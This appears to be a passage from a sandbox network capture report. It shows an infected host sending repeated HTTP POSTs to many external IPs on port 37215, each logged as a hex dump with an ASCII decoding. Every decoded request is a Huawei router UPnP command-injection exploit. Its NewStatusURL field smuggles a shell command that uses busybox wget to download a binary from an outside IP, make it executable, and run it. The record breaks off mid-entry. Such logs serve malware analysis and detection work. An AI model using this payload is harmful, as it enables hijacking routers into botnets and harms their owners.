                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1689192.168.2.1541458222.201.27.24237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944680929 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1690192.168.2.1537678138.203.248.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944684029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1691192.168.2.155530641.86.199.3837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944698095 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1692192.168.2.1551746190.80.93.3837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944740057 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1693192.168.2.1547120122.115.93.8237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944741011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1694192.168.2.154196031.197.180.6237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944749117 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1695192.168.2.1548232190.58.88.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944770098 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1696192.168.2.1552686138.72.200.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944791079 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1697192.168.2.1536862222.242.255.10637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944813013 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1698192.168.2.1558886222.251.226.19037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944829941 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
